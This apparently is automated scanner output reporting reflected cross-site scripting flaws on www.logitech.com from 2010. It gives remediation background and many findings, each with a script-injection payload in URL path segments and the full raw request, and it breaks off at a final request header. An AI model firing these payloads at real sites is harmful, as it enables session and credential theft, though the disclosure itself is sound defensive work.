Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7784</script><script>alert(1)</script>9a6e0835833 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /349f7784</script><script>alert(1)</script>9a6e0835833/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e226"><script>alert(1)</script>b89149fdcec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /3498e226"><script>alert(1)</script>b89149fdcec/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc92e</script><script>alert(1)</script>f5f38212be6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b6a0"><script>alert(1)</script>abef1686553 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0dae"><script>alert(1)</script>d1c78e40ff3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c909b</script><script>alert(1)</script>24401b002b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36661"><script>alert(1)</script>1e4bdda8a64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /[{lclid}]36661"><script>alert(1)</script>1e4bdda8a64/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8da1</script><script>alert(1)</script>45daf56d365 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /[{lclid}]b8da1</script><script>alert(1)</script>45daf56d365/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36a45"%3b5f92b547f49 was submitted in the REST URL parameter 1. This input was echoed as 36a45";5f92b547f49 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /[{lclid}]36a45"%3b5f92b547f49/69/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:03:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f73"><script>alert(1)</script>cf1f5a43e78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /[{lclid}]11f73"><script>alert(1)</script>cf1f5a43e78/69/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92e2f</script><script>alert(1)</script>ab14f89b30d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /[{lclid}]92e2f</script><script>alert(1)</script>ab14f89b30d/69/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f1e8</script><script>alert(1)</script>c66fc837737 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /[{lclid}]/691f1e8</script><script>alert(1)</script>c66fc837737/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9923"><script>alert(1)</script>992f80526f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /[{lclid}]/69d9923"><script>alert(1)</script>992f80526f1/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a47a2"><script>alert(1)</script>d3f9bf6bc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /[{lclid}]a47a2"><script>alert(1)</script>d3f9bf6bc4/69/7112 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 203c0</script><script>alert(1)</script>762ee0b3a24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /[{lclid}]203c0</script><script>alert(1)</script>762ee0b3a24/69/7112 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eeb3"%3bfac010147b1 was submitted in the REST URL parameter 1. This input was echoed as 5eeb3";fac010147b1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /[{lclid}]5eeb3"%3bfac010147b1/69/7112 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3263</script><script>alert(1)</script>00909e79a22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /[{lclid}]/69f3263</script><script>alert(1)</script>00909e79a22/7112 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 271cc"><script>alert(1)</script>d3712e37ad4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /[{lclid}]/69271cc"><script>alert(1)</script>d3712e37ad4/7112 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fcdaa</script><script>alert(1)</script>d0929049bc5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /[{lclid}]/69/7112fcdaa</script><script>alert(1)</script>d0929049bc5 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e270c"><script>alert(1)</script>41a4e081ad8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /[{lclid}]/69/7112e270c"><script>alert(1)</script>41a4e081ad8 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 729ff</script><script>alert(1)</script>c269ff263a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /alert729ff</script><script>alert(1)</script>c269ff263a0/digital-video-security-system HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be86f"><script>alert(1)</script>647b6231d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alertbe86f"><script>alert(1)</script>647b6231d58/digital-video-security-system HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 885b2</script><script>alert(1)</script>ad4575a1fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /alert/digital-video-security-system885b2</script><script>alert(1)</script>ad4575a1fa HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6640a"><script>alert(1)</script>0f4edc06f36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alert/digital-video-security-system6640a"><script>alert(1)</script>0f4edc06f36 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 891c0"><script>alert(1)</script>8c81f17c142 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /891c0"><script>alert(1)</script>8c81f17c142/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d51be</script><script>alert(1)</script>22df83572d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /d51be</script><script>alert(1)</script>22df83572d0/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae398</script><script>alert(1)</script>9af0d89f918 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ae398</script><script>alert(1)</script>9af0d89f918/14279/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e850a"><script>alert(1)</script>a573fb14849 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
